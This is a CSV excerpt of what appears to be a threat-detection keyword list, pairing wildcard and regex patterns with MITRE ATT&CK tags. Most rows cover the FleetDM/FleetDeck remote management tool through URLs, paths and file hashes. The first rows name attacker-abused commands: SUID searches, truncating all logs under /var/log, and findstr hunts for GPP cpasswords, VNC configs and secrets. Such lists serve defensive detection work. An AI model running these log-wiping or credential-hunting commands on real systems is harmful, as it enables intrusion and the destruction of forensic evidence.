"*find / -user root -perm -6000 -type f 2>*",".{0,1000}find\s\/\s\-user\sroot\s\-perm\s\-6000\s\-type\sf\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find /* -perm -04000 -o -perm -02000*",".{0,1000}find\s\/.{0,1000}\s\-perm\s\-04000\s\-o\s\-perm\s\-02000.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find /* -perm -u=s -type f 2>*",".{0,1000}find\s\/.{0,1000}\s\-perm\s\-u\=s\s\-type\sf\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find /var/log -type f -exec truncate -s 0 {} \*",".{0,1000}find\s\/var\/log\s\-type\sf\s\-exec\struncate\s\-s\s0\s\{\}\s\\.{0,1000}","greyware_tool_keyword","find","truncate every file under /var/log to size 0 - no log content = no forensic.","T1486 - T1553 - T1592.002 - T1081","TA0005 - TA0007 - TA0009","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*findstr *cpassword *\sysvol\*.xml*",".{0,1000}findstr\s.{0,1000}cpassword\s.{0,1000}\\sysvol\\.{0,1000}\.xml.{0,1000}","greyware_tool_keyword","findstr","linux commands abused by attackers - gpp finder","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A"
"*findstr *vnc.ini*",".{0,1000}findstr\s.{0,1000}vnc\.ini.{0,1000}","greyware_tool_keyword","findstr","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A"
"*findstr /si secret *.docx*",".{0,1000}findstr\s\/si\ssecret\s.{0,1000}\.docx.{0,1000}","greyware_tool_keyword","findstr","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A"
"*agent.fleetdeck.io/*?win*",".{0,1000}agent\.fleetdeck\.io\/.{0,1000}\?win.{0,1000}","greyware_tool_keyword","fleetdeck","FleetDeck is a Remote Desktop & Virtual Terminal solution tailored for techs to  manage large fleets of computers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://fleetdeck.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* install-fleetctl.sh*",".{0,1000}\sinstall\-fleetctl\.sh.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*.dev1.fleetdeck.io*",".{0,1000}\.dev1\.fleetdeck\.io.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*/.fleetctl/fleetctl*",".{0,1000}\/\.fleetctl\/fleetctl.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*/api/latest/fleet/mdm/bootstrap?token=*",".{0,1000}\/api\/latest\/fleet\/mdm\/bootstrap\?token\=.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*/api/v1/fleet/mdm/sso/callback*",".{0,1000}\/api\/v1\/fleet\/mdm\/sso\/callback.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*/etc/fleet/fleet.env*",".{0,1000}\/etc\/fleet\/fleet\.env.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*/fleet_v*_linux.tar.gz*",".{0,1000}\/fleet_v.{0,1000}_linux\.tar\.gz.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*/fleetd.crx*",".{0,1000}\/fleetd\.crx.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*/fleetdm/fleet/releases/download/*",".{0,1000}\/fleetdm\/fleet\/releases\/download\/.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*/fleetdm/fleet/releases/latest*",".{0,1000}\/fleetdm\/fleet\/releases\/latest.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*/install-fleetctl.sh*",".{0,1000}\/install\-fleetctl\.sh.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*/tmp/fleet_remove_log.txt*",".{0,1000}\/tmp\/fleet_remove_log\.txt.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*:9001/proxy/mdmserver1/account*",".{0,1000}\:9001\/proxy\/mdmserver1\/account.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*\\.\pipe\orbit-osquery-extension*",".{0,1000}\\\\\.\\pipe\\orbit\-osquery\-extension.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#namedpipe","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*>FleetDeck Inc<*",".{0,1000}\>FleetDeck\sInc\<.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#companyname","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*00b377900f7213590db683ce75b4d3ae6053633a5938148afeefd607d0e88319*",".{0,1000}00b377900f7213590db683ce75b4d3ae6053633a5938148afeefd607d0e88319.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*017439a15b04aafd322811f9812262e02f5f0bdf2aa252d46a06d7d118dd24f4*",".{0,1000}017439a15b04aafd322811f9812262e02f5f0bdf2aa252d46a06d7d118dd24f4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0237e84c1a958e0c3bd52228ed33aad0e847d5e72a679381ade503ce1dfddc8b*",".{0,1000}0237e84c1a958e0c3bd52228ed33aad0e847d5e72a679381ade503ce1dfddc8b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*026fd2dd800e84250a19978fc4df8d1c2ff01b61cafdc0aeeb205efb9259fd73*",".{0,1000}026fd2dd800e84250a19978fc4df8d1c2ff01b61cafdc0aeeb205efb9259fd73.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*035a602153cd10af0c370d9863749b006a2590a7c274bb1cb698016a98ccab3f*",".{0,1000}035a602153cd10af0c370d9863749b006a2590a7c274bb1cb698016a98ccab3f.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*03b2d5858587fcf2c5d6f7cdc4a4401318ee63066f936e295f9e94e8c66f0a86*",".{0,1000}03b2d5858587fcf2c5d6f7cdc4a4401318ee63066f936e295f9e94e8c66f0a86.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*045ccab12ac435e6f5a85a15f8109d168193a8370c3a234befa0e960ba609ffa*",".{0,1000}045ccab12ac435e6f5a85a15f8109d168193a8370c3a234befa0e960ba609ffa.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*069a56ca99f366c294536ade1d99de76e68aac6450bdb5f8b59258295bb1ff22*",".{0,1000}069a56ca99f366c294536ade1d99de76e68aac6450bdb5f8b59258295bb1ff22.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*07ae98d2c32434b5ae6382cf43dda0e42ece5e6788be97f07f6262e9b72cb3a8*",".{0,1000}07ae98d2c32434b5ae6382cf43dda0e42ece5e6788be97f07f6262e9b72cb3a8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*07e837c2ad8be50c19a464a4db64a912acf2e5d5531fdbfe2c4ac5ac008c83ab*",".{0,1000}07e837c2ad8be50c19a464a4db64a912acf2e5d5531fdbfe2c4ac5ac008c83ab.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0a80748ee061b0dc3fef0ecf95abcdcf6554fb09e2f3675fa8f48c43d5582dfa*",".{0,1000}0a80748ee061b0dc3fef0ecf95abcdcf6554fb09e2f3675fa8f48c43d5582dfa.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0b860218a265d58208a132a83dcf04780635337c722caa05cbbd281b32749a91*",".{0,1000}0b860218a265d58208a132a83dcf04780635337c722caa05cbbd281b32749a91.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0bec3d7403f9a089a30003eb12d000cfac25e12e826055d87dd111f3e7bb8559*",".{0,1000}0bec3d7403f9a089a30003eb12d000cfac25e12e826055d87dd111f3e7bb8559.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0c4413aa7e74903ba6c00cd78d60bb9a153d5775949a90d2c794ec00cef7fbd8*",".{0,1000}0c4413aa7e74903ba6c00cd78d60bb9a153d5775949a90d2c794ec00cef7fbd8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0cbf3ed058d43997b5b034e7c60de64b16ef94a3578358eaf0b4b4a9e6777446*",".{0,1000}0cbf3ed058d43997b5b034e7c60de64b16ef94a3578358eaf0b4b4a9e6777446.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0ce68a99407f300b71cebe379dfa81096726595934a8dcd45360f84dc6c08163*",".{0,1000}0ce68a99407f300b71cebe379dfa81096726595934a8dcd45360f84dc6c08163.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0cfb5b4de55c4affbc5df2d949015300f554d0eca7bb925a79db14997d5c18e2*",".{0,1000}0cfb5b4de55c4affbc5df2d949015300f554d0eca7bb925a79db14997d5c18e2.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0d34f8d272ad4e604c2798ad670d2a2b06d397cc38fa3d84382a16d014c43925*",".{0,1000}0d34f8d272ad4e604c2798ad670d2a2b06d397cc38fa3d84382a16d014c43925.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0f7e030eec92ad940dbdafa3806a0140d7589219d7de05301e8cf622e63683df*",".{0,1000}0f7e030eec92ad940dbdafa3806a0140d7589219d7de05301e8cf622e63683df.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0fdf8c16ffc44fe0006ac5e07721c17a7995c0bcdb4309d3d66697a8f153b402*",".{0,1000}0fdf8c16ffc44fe0006ac5e07721c17a7995c0bcdb4309d3d66697a8f153b402.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*0ffa09304c7f2966f94a1acc5848c0adfa1cdf70525ec51f52722af4624572c3*",".{0,1000}0ffa09304c7f2966f94a1acc5848c0adfa1cdf70525ec51f52722af4624572c3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1078cdf24990c103ac9a35c7081bfdf4ea6d0d62d6c9b1a5624a6ab9c6fcb07b*",".{0,1000}1078cdf24990c103ac9a35c7081bfdf4ea6d0d62d6c9b1a5624a6ab9c6fcb07b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*149ca8b9b2f375a73adf0ae4739f7ab0c83477202c5875ef7f3e2716a087d2ee*",".{0,1000}149ca8b9b2f375a73adf0ae4739f7ab0c83477202c5875ef7f3e2716a087d2ee.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*151e41e5d547de46a4557bef41a35790951a7926646c7d35d1ed1ef7f9961964*",".{0,1000}151e41e5d547de46a4557bef41a35790951a7926646c7d35d1ed1ef7f9961964.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*157f7d3b048d686f719fdbfe50ee4bc9676d6443211d13cdf0a49b108f1fd6eb*",".{0,1000}157f7d3b048d686f719fdbfe50ee4bc9676d6443211d13cdf0a49b108f1fd6eb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*16813fc81e4ffa28723f54b0d63838e77da5c8e12c13ae73ec949870c440ecfa*",".{0,1000}16813fc81e4ffa28723f54b0d63838e77da5c8e12c13ae73ec949870c440ecfa.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*17419f33715f3074f54f71fdaf6e732a28da9961b7143de67e7d91dd6e885191*",".{0,1000}17419f33715f3074f54f71fdaf6e732a28da9961b7143de67e7d91dd6e885191.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*189d2b311c47271dd6c1bed36d8531cdf20e2f21aff699d1fe6d8e29020bde63*",".{0,1000}189d2b311c47271dd6c1bed36d8531cdf20e2f21aff699d1fe6d8e29020bde63.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*18aced79e1431c887174daad2c6076afbd67034fd5ef72042260feffce27a274*",".{0,1000}18aced79e1431c887174daad2c6076afbd67034fd5ef72042260feffce27a274.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1a9fb59e84b29362e747cf4191c4100ccfa6c52fd766eedb831a4169923976eb*",".{0,1000}1a9fb59e84b29362e747cf4191c4100ccfa6c52fd766eedb831a4169923976eb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1b60f0c6902fde29c56d8ef1df0be1b1ba81320c08aeeae8aa34b2f3698c5cae*",".{0,1000}1b60f0c6902fde29c56d8ef1df0be1b1ba81320c08aeeae8aa34b2f3698c5cae.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1ba101f6b07b3194b481dfad27f70bfa23e86a822b49e8c6b3138e57f13614c7*",".{0,1000}1ba101f6b07b3194b481dfad27f70bfa23e86a822b49e8c6b3138e57f13614c7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1bcbac2e969778df504fbe04dd5bfb1e337c141869efdca9c3974e8c97296e18*",".{0,1000}1bcbac2e969778df504fbe04dd5bfb1e337c141869efdca9c3974e8c97296e18.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1c28a3ecf4991146bccfd39ec97c8c060286596c44caedb598feaaf607b277cd*",".{0,1000}1c28a3ecf4991146bccfd39ec97c8c060286596c44caedb598feaaf607b277cd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1d289b4fb2f8766a1a1e7f8bab7472322f721c1c2f7ecf676f0c9dadfc7f66b3*",".{0,1000}1d289b4fb2f8766a1a1e7f8bab7472322f721c1c2f7ecf676f0c9dadfc7f66b3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1d6101c42021d29583532660865649b7e609b0862e3bd0b164ec794b2953a2f0*",".{0,1000}1d6101c42021d29583532660865649b7e609b0862e3bd0b164ec794b2953a2f0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1d7c4f0e2045835904ee9c994212605d67aef12c7899d8d203039100dc038db7*",".{0,1000}1d7c4f0e2045835904ee9c994212605d67aef12c7899d8d203039100dc038db7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1e938fb7b547413a088c96ada20ab163fe27f12d2124aa1cb652f68ec0448970*",".{0,1000}1e938fb7b547413a088c96ada20ab163fe27f12d2124aa1cb652f68ec0448970.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1f615397bacd86a29514e0cc9981af1e76ba261c6634367508a7fd88bc088724*",".{0,1000}1f615397bacd86a29514e0cc9981af1e76ba261c6634367508a7fd88bc088724.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
